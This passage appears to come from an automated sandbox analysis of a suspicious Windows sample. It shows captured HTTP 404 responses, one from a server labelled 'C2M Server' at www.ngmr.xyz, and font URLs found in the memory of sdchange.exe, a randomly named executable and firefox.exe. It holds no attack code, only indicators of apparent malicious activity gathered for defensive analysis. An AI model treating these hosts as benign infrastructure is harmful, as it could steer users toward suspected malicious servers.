            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 03:39:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 03:39:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 03:39:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:39:27 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:39:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:39:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:39:35 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Tue, 22 Oct 2024 04:03:12 GMTX-Varnish: 1435552209Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Tue, 22 Oct 2024 04:03:14 GMTX-Varnish: 1435552220Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Tue, 22 Oct 2024 04:03:17 GMTX-Varnish: 1435552224Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Tue, 22 Oct 2024 04:03:19 GMTX-Varnish: 1435552229Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:40:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:40:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:40:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:40:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
